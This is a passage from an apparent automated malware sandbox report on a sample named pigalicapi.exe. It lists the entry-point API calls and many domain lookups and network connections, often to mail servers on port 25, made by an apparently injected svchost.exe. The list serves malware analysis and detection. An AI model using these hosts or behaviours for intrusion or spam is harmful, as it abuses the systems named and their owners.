                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01173B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_01173B00
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B3B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,3_2_007B3B00

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.26 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.13.244 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.195 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.177.126.27 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.38 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pohlfood.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.191.209.76 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.236.62.147 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.31 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 207.180.198.201 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.24.177 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.76.27.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.246.117.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.10.34 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnsds.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.223 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.12.244 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.148.147 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.216.241.100 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.19.68 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.34.21 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.207 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 134.119.176.30 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.19.116.195 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pb-games.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.195.90.46 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messaginguser.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.sclover3.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.0.82 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 72.251.233.245 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.74.157.89 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.217 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.216 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.32.172 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.18.233 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
